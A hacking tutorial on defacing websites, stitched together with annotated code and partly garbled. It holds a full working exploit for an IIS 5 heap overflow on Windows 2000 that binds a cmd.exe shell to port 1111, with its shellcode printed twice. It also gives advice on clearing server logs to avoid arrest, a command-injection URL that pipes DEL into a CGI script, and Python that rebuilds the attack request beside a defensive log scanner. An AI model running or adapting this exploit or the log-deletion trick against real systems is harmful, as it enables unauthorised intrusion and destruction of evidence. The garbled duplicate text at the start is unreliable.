xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run Now you

must be wondering what is the use of this code Actually the C

code causes an overflow in IIS on Windows 2000 and commands

the system to bind a shell to the source Ip on port 1111 So once

the exploit works there will be a shell bind on port 1111 on the

target system To workout you must telnet the target IP into port

1111 through this you will be connected to the system without

any kind of authentication

Various Security Measures

Website defacement has become a terrible problem for IT

(Information Technology) based companies Everyday thousands

of websites are defaced Well even Government websites are

defaced for different reasons the most common reason is cyber

war Like in reality there are wars between two rival countries

similarly in wired world there are cyber wars

If you want to see the web attack archive visit the following site

httpdefacedalldasorg

Now some security measures for the system administrators

- First of all you must coordinate and organize your web root

with suitable directories What I mean to say is that you must

organize your files like images in an image directory one for

server side contents and so on so forth If you donrsquot configure your

web root properly then your web server will be prone to many

attacks

- You must be aware of the latest vulnerabilities visit these sites

httpwwwsecurityfocuscom

httpwwwpacketstormorg

httpwwwguininskicom

httpwwwinsecureorg

httpwwwsecuriteamcom

httpwwwslashdotorg

httpwwwtechnotroniccom

Well every web server is vulnerable but you must not fear you

must download the latest patches for the particular vulnerability

Well the last thing is that you must be able to predict the moves

of a malicious cracker or a script kiddie You need to know how a

cracker breaks into your site or web server you need to know the

motive behind the attack and you must think act and work like a

hacker and take the cracker out from the root

So this completes my tutorial on Defacing websites I hope you

have understood the involutions of web servers

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 16: Defacing Website

- Type the URL of the victim server homepage and in the given

box here it is wwwvictimcomindexhtml

- Here specify the URL that you type in the Web browser to access

the victim server website

- Select the connection method that you use to access the internet

- Click Finish Voila you have successfully replaced the victimrsquos

homepage with yours

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some

coding exploits I am going to present some exploit codes written

in the most powerful programming language C

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

use MS VC++ to compile this piece of code

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

        "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
        "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
        "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
        "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
        "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
        "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
        "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
        "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
        "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
        "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
        "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
        "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
        "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
        "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
        "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
        "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
        "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
        "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
        "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
        "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
        "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
        "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
        "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
        "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
        "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
        "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
        "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
        "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
        "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
        "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
        "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
        "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
        "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
        "\xff\xff\x95\x18\xff\xff\xff";

    /* Pieces of the HTTP request. The NOP sled and shellcode go into the
       request line itself; the chunked body only carries the pad and the
       two 4-byte values that steer the overflow. */
    char* s1 = "POST ";
    char* s2 = "Accept: */*\r\n";
    char* s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
    char* s5 = "Transfer-Encoding: chunked\r\n\r\n";
    char* sc = "0\r\n\r\n\r\n";            /* zero-length chunk ends the body */

    /* 8 KB buffer of 0x90 (NOP) with the shellcode at its end, NUL-terminated */
    char shellcodebuff[1024 * 8];
    memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1],
           shellcode, strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff) - 1] = 0;

    /* Chunk sizes are hex: "10" is the 16-byte pad, then two 4-byte chunks
       whose placeholder text AAAA/BBBB is patched with srcdata/jmpaddr below. */
    char sendbuff[1024 * 16];
    memset(sendbuff, 0, 1024 * 16);
    sprintf(sendbuff,
            "%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, sc);
    /* Measure before patching: jmpaddr contains a 0x00 byte, which would
       make strlen() stop short of the terminating chunk. */
    int sendlen = strlen(sendbuff);
    *(DWORD*)strstr(sendbuff, "BBBB") = jmpaddr;
    *(DWORD*)strstr(sendbuff, "AAAA") = srcdata;

    result = send(s, sendbuff, sendlen, 0);
    if (result == SOCKET_ERROR)
    {
        puts("Send shellcode error");
        return -1;
    }

    /* A normal HTML answer means the overflow did not trigger. */
    memset(buff, 0, 4096);
    result = recv(s, buff, sizeof(buff), 0);
    if (strstr(buff, "<html>") != NULL)
    {
        shutdown(s, 0);
        closesocket(s);
        puts("Send shellcode error! Try again!");
        return -1;
    }

    shutdown(s, 0);
    closesocket(s);
    printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
    puts("If you cannot connect to the host, try run this program again!");
    return 0;
}

The program above is what is called an exploit: a piece of code, usually written in C or Perl and occasionally in Java, that triggers one specific vulnerability and turns it into something useful to the attacker, here a shell on the server. An exploit is written against one bug in one particular build, so it seldom works unchanged. The vulnerabilities that public exploits target were discovered some time ago, and by now server software and operating systems have been patched against most of them, so you cannot simply run a downloaded exploit against a server and expect to get in. You have to rework the exploit for your target: in the listing above the two addresses srcdata and jmpaddr, and the values patched over the AAAA and BBBB placeholders, are specific to the Chinese Windows 2000 build the authors tested on, and a different build needs different values. That also means keeping yourself up to date with the latest vulnerabilities on the sites mentioned earlier in this tutorial, and in the end it is better to write your own exploit code in Perl or C than to depend on somebody else's.

NOTE: I am talking about high-profile websites here, not about lame websites coded in Notepad.
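To see what the listing above actually puts on the wire, and which parts of it are target-specific, here is a Python rebuild of the same request. This is an added example, not code from the tutorial or from the CHINANSL program; the constants are copied from the C listing, and the hypothetical shellcode passed in at the bottom is a stand-in for the real one. The chunked-body decoder is a general one and shows that the body carries only the 16-byte pad and two 4-byte values, which are exactly the parts that must be reworked for a different Windows 2000 build.

```python
"""Rebuild the request the CHINANSL program sends (added example, not code
from the tutorial) so its layout can be inspected without compiling it."""
import struct

# Constants copied from the C listing. They are specific to the Chinese
# Windows 2000 build the authors tested on and are the first thing to
# change when reworking the exploit for another build.
SRCDATA = 0x01E2FB1C - 4
JMPADDR = 0x00457494
PAD = b"\xcc\xcc\xcc\xcc" + b"ADPA" + b"\x02\x02\x02\x02" + b"PADP"  # 16 bytes
SLED_LEN = 8 * 1024 - 1  # sizeof(shellcodebuff) minus its terminating NUL


def build_request(path, host, shellcode, srcdata=SRCDATA, jmpaddr=JMPADDR):
    """Return the exact bytes the exploit writes to the socket.

    The NOP sled and shellcode ride in the request line; the chunked body
    carries only the 16-byte pad and two little-endian DWORDs that steer
    the overflow (the C code patches them over "AAAA" and "BBBB").
    """
    if len(shellcode) > SLED_LEN:
        raise ValueError("shellcode does not fit in the sled buffer")
    sled = b"\x90" * (SLED_LEN - len(shellcode)) + shellcode
    head = (b"POST " + path.encode() + sled + b" HTTP/1.1\r\n"
            + b"Accept: */*\r\n"
            + b"Host: " + host.encode() + b"\r\n"
            + b"Content-Type: application/x-www-form-urlencoded\r\n"
            + b"Transfer-Encoding: chunked\r\n\r\n")
    body = (b"10\r\n" + PAD + b"\r\n"                          # 0x10 bytes
            + b"4\r\n" + struct.pack("<I", srcdata) + b"\r\n"
            + b"4\r\n" + struct.pack("<I", jmpaddr) + b"\r\n"  # has a 0x00 byte
            + b"0\r\n\r\n\r\n")                                # last chunk
    return head + body


def split_request(req):
    """Split a raw request into (head, body) at the first blank line."""
    head, _, body = req.partition(b"\r\n\r\n")
    return head, body


def parse_chunked(body):
    """Decode a chunked body into its chunks; raise ValueError if malformed.

    General decoder (hex size line, optional ';extension', data, CRLF,
    terminated by a zero-length chunk), not specific to this exploit.
    """
    chunks, pos = [], 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("missing chunk-size line")
        size = int(body[pos:end].split(b";")[0], 16)
        pos = end + 2
        if size == 0:
            return chunks
        chunks.append(body[pos:pos + size])
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2


if __name__ == "__main__":
    # Hypothetical stand-in for the real shellcode (eight int3 bytes).
    req = build_request("/iisstart.asp", "10.0.0.5", b"\xcc" * 8)
    head, body = split_request(req)
    print("request line length:", len(head.split(b"\r\n", 1)[0]))
    for i, chunk in enumerate(parse_chunked(body)):
        print("chunk", i, chunk.hex())
```

Two things stand out once the request is laid out this way: the request line is over 8 KB long, which is what any log or IDS sees of this attack, and the packed jmpaddr contains a zero byte, which is why the C program measures the buffer with strlen() before patching the placeholders rather than after.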

Keeping yourself safe

You should be familiar with server software such as Apache and Microsoft IIS, and therefore with their log files, which record every request the server handles. Each entry carries the client's IP (Internet Protocol) address together with the time, the request line and the response code, so an administrator who reads the logs has no trouble catching the malicious cracker or script kiddie: the IP address is traced back through the ISP. Bear in mind what the exploit above leaves behind if the server survives long enough to write the entry: a POST whose request line is eight kilobytes of 0x90 bytes, which stands out in any log even without a signature for it.

NOTE: Read my tutorial on Gathering Information of Remote Host.

TIP: If you do not want to get busted you must clear the log files after you break into a web server.

CLEARING LOGS

You must clear the logs in order to save yourself from getting busted. One way to do it is through a command-injection bug in a CGI script (not cross-site scripting, which runs in a visitor's browser and cannot touch files on the server): when the server passes the query string to a command interpreter unfiltered, a pipe character lets you append a command of your own. The request has the form

http://www.target.com/cgi-bin/test-cgi.bat?|DEL+log

NOTE: The above URL targets Apache, and specifically Apache for Windows, where .bat and .cmd CGI scripts were run through cmd.exe with the query string on the command line; Apache on Unix does not execute .bat files at all. Whether it works also depends on the CGI process having the privilege to remove the file, and on the request not being recorded somewhere the web server does not control, such as a proxy, a firewall or a remote log host.
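For the defender's side of the two sections above, here is an added example (not part of the tutorial) that scans a few constructed log lines for the traces these attacks leave: a POST whose URI stem is thousands of bytes long, which is what the 8 KB sled in the IIS exploit's request line looks like if the server survives to log it, and a shell metacharacter in the query string of a .bat CGI, the shape of the log-deletion URL above. All log lines are made up for the example; the 1024-byte threshold, and the assumption that IIS records the oversized stem at all rather than dropping the entry, are assumptions of the example.

```python
"""Scan web-server access logs for the traces of the two attacks above.
Added example, not part of the tutorial; every log line is constructed."""
import re
from dataclasses import dataclass

LONG_URI = 1024  # assumption: no legitimate .asp path comes near this length

# Apache common/combined log format; the request line split into its parts.
APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# A .bat/.cmd CGI script whose query string hands '|' or '&' to cmd.exe.
BAT_PIPE_RE = re.compile(r'/cgi-bin/[^?\s]+\.(?:bat|cmd)\?\S*[|&]', re.I)


@dataclass
class Hit:
    line_no: int
    client: str
    reason: str


def scan_iis_w3c(lines):
    """Flag IIS W3C-extended entries with an oversized POST URI stem.

    Field order is taken from the #Fields: directive, so the function works
    whatever columns the server was configured to log.
    """
    hits, fields = [], []
    for n, line in enumerate(lines, 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        rec = dict(zip(fields, line.split()))
        stem = rec.get("cs-uri-stem", "")
        if rec.get("cs-method") == "POST" and len(stem) > LONG_URI:
            hits.append(Hit(n, rec.get("c-ip", "?"),
                            "POST with %d-byte URI stem" % len(stem)))
    return hits


def scan_apache(lines):
    """Flag Apache access-log entries that pipe a command into a .bat CGI."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = APACHE_RE.match(line)
        if m and BAT_PIPE_RE.search(m.group("target")):
            hits.append(Hit(n, m.group("ip"),
                            "shell metacharacter in CGI query: " + m.group("target")))
    return hits


# Constructed sample logs: line 4 of the IIS log and line 2 of the Apache
# log are the attacks, the other lines are ordinary traffic. The "%90"
# run is a stand-in for however the server renders the sled in its log.
IIS_SAMPLE = [
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2002-04-15 10:01:02 10.0.0.7 GET /iisstart.asp - 200",
    "2002-04-15 10:01:09 10.0.0.9 POST /iisstart.asp" + "%90" * 2730 + " - 500",
]
APACHE_SAMPLE = [
    '10.0.0.7 - - [15/Apr/2002:10:02:11 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '10.0.0.9 - - [15/Apr/2002:10:02:40 +0000] "GET /cgi-bin/test-cgi.bat?|DEL+log HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for hit in scan_iis_w3c(IIS_SAMPLE) + scan_apache(APACHE_SAMPLE):
        print(hit)
```

The point of reading the #Fields: line instead of hard-coding column positions is that IIS administrators choose which W3C fields to log, so a scanner with fixed offsets silently reads the wrong column on the next server. Sending the log lines to a host the web server cannot write to is what makes the "clear the logs" step above fail.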

In the case of IIS on Windows 2000 you can use the following method to get a DOS shell through telnet.

The following code exploits a buffer overflow in IIS 5 on Windows 2000 Server, specifically a heap overflow in the ASP ISAPI extension's handling of chunked transfer encoding, which Microsoft patched in April 2002 (bulletin MS02-018), so it only works against an unpatched server. The payload opens port 1111 on the target and binds a shell to it. If the exploit is successful, all you have to do is telnet to port 1111 on the target and the system is yours.

/*
   Windows 2000 Server Exploit By CHINANSL Security Team
   Test on Windows 2000 Chinese Version, IIS 5.0, not patched.
   Warning: THIS PROGRAM WILL ONLY TEST!
   CHINANSL Technology CO., LTD   http://www.chinansl.com
   keji@chinansl.com
*/

/* Build with MS VC++ as a console project. The original included the
   project's precompiled header "stdafx.h"; including winsock2.h directly
   makes that unnecessary. The pragma links Ws2_32.lib. */
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment (lib, "Ws2_32")

int main(int argc, char* argv[])
{
    if (argc != 4)
    {
        printf("%s ip port aspfilepath\n\n", argv[0]);
        printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n", argv[0]);
        puts(" programed by keji@chinansl.com");
        return 0;
    }

    /* Both addresses are hard-coded for the Chinese Windows 2000 build the
       authors tested on; the values in comments are alternatives they tried.
       srcdata is where the request data lands, jmpaddr is the location that
       gets overwritten so execution is redirected into the sled. */
    DWORD srcdata = 0x01e2fb1c - 4;    /* 0x00457474 */
    /* address of SHELLCODE */
    DWORD jmpaddr = 0x00457494;        /* 0x77ebf094, 0x01e6fcec,
                                          "\x1c\xfb\xe6\x01", "\x0c\xfb\xe6\x01" */
    char* destIP   = argv[1];
    char* destFile = argv[3];
    int   webport  = atoi(argv[2]);
    /* 16 bytes of filler sent as the first chunk */
    char* pad = "\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP";

    WSADATA ws;
    SOCKET  s;
    long    result = 0;

    if (WSAStartup(0x0101, &ws) != 0)
    {
        puts("WSAStartup() error");
        return -1;
    }

    struct sockaddr_in addr;
    addr.sin_family      = AF_INET;
    addr.sin_port        = htons(webport);
    addr.sin_addr.s_addr = inet_addr(destIP);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == INVALID_SOCKET)
    {
        puts("Socket create error");
        return -1;
    }

    if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == SOCKET_ERROR)
    {
        puts("Cannot connect to the specified host");
        return -1;
    }

    char buff[4096];

    /* Bind-shell payload: loads kernel32 and wsock32, resolves the functions
       it needs by ordinal through GetProcAddress, listens on TCP port 1111
       (the bytes 04 57 below, in network order) on every interface, and
       attaches cmd.exe to the accepted connection through a pair of pipes. */
    char* shellcode =
        "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
        "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
        "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
        "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
        "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
        "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
        "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
        "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
        "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
        "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
        "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
        "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
        "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
        "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
        "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
        "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
        "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
        "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
        "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
        "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
        "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
        "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
        "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
        "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
        "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
        "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
        "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
        "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
        "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
        "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
        "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
        "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
        "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
        "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
        "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
        "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
        "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
        "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
        "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
        "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
        "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
        "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
        "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
        "\xff\xff\x95\x18\xff\xff\xff";

    /* Pieces of the HTTP request. The NOP sled and shellcode go into the
       request line itself; the chunked body only carries the pad and the
       two 4-byte values that steer the overflow. */
    char* s1 = "POST ";
    char* s2 = "Accept: */*\r\n";
    char* s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
    char* s5 = "Transfer-Encoding: chunked\r\n\r\n";
    char* sc = "0\r\n\r\n\r\n";            /* zero-length chunk ends the body */

    /* 8 KB buffer of 0x90 (NOP) with the shellcode at its end, NUL-terminated */
    char shellcodebuff[1024 * 8];
    memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1],
           shellcode, strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff) - 1] = 0;

    /* Chunk sizes are hex: "10" is the 16-byte pad, then two 4-byte chunks
       whose placeholder text AAAA/BBBB is patched with srcdata/jmpaddr below. */
    char sendbuff[1024 * 16];
    memset(sendbuff, 0, 1024 * 16);
    sprintf(sendbuff,
            "%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, sc);
    /* Measure before patching: jmpaddr contains a 0x00 byte, which would
       make strlen() stop short of the terminating chunk. */
    int sendlen = strlen(sendbuff);
    *(DWORD*)strstr(sendbuff, "BBBB") = jmpaddr;
    *(DWORD*)strstr(sendbuff, "AAAA") = srcdata;

    result = send(s, sendbuff, sendlen, 0);
    if (result == SOCKET_ERROR)
    {
        puts("Send shellcode error");
        return -1;
    }

    /* A normal HTML answer means the overflow did not trigger. */
    memset(buff, 0, 4096);
    result = recv(s, buff, sizeof(buff), 0);
    if (strstr(buff, "<html>") != NULL)
    {
        shutdown(s, 0);
        closesocket(s);
        puts("Send shellcode error! Try again!");
        return -1;
    }

    shutdown(s, 0);
    closesocket(s);
    printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
    puts("If you cannot connect to the host, try run this program again!");
    return 0;
}

IMPLEMENTATION OF THE CODE

To use the C code, compile it (with MS VC++, as noted above) and run it with the target IP, the web port and the path of an .asp file on the server. What it does: it sends a single POST request whose request line carries the NOP sled and shellcode and whose chunked body carries two 4-byte values that corrupt the heap inside asp.dll, so that IIS ends up executing the shellcode. The shellcode does not connect back to you; it listens on port 1111 on every interface of the target and attaches cmd.exe to the first connection it accepts. So once the exploit works there is a shell bound to port 1111 on the target system. To use it, telnet to port 1111 on the target IP and you are connected to the system without any kind of authentication, with the privileges of the process that hosted asp.dll (LocalSystem for an in-process IIS 5 application, IWAM_machinename for a pooled or isolated one). Anyone else who can reach port 1111 gets the same shell, which is 